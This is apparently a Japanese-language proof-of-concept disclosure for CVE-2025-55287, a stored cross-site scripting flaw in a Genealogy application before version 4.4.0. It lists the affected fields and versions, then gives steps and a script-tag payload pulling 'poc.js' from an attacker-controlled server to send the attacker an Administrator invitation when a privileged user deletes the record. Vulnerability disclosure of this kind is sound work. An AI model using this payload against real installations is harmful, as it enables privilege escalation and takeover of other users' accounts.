CVE-2025-55287-POC
4.4.0 より前の Genealogy アプリにおける認証済み格納型クロスサイトスクリプティング (XSS) により、任意の JavaScript の実行と、Editor+ ロールから Administrator への権限昇格が可能になります。
概要
- 脆弱性タイプ: 格納型クロスサイトスクリプティング (CWE-79)
- 影響を受けるコンポーネント: 「Person」の firstname および lastname。
- 影響を受けるバージョン: 4.4.0 より前のすべてのバージョン
- 影響: 被害者のブラウザ上で攻撃者が提供した JavaScript が永続的に実行される。セッションハイジャック、DOM を介した CSRF、UI リドレス、認証情報の窃取、または被害者としての任意の操作。
- 攻撃ベクトル: 認証済み(新しい人物を作成できる任意のロール - editor+)
悪用方法
根本原因: 影響を受ける人物が上位権限ユーザーによって正常に削除された際に、人物の firstname/lastname に対するサーバーサイドのサニタイズ/エンコーディングが不十分であること。
PoC:
- アプリケーションに認証します(editor+ ロール)。
- 新しい人物を作成します(必ずしもいずれかの家族に割り当てる必要はありません)。
- 追加した人物の first name または last name として JavaScript を含めます:
<script src='yourserver/poc.js'></script>
- プレースホルダーに自分のメールアドレスを指定して poc.js を編集します。
- 特権ユーザーが新しく追加された人物を削除しようとすると、指定したメールアドレスに Administrator ロールのプラットフォームへの招待が届きます。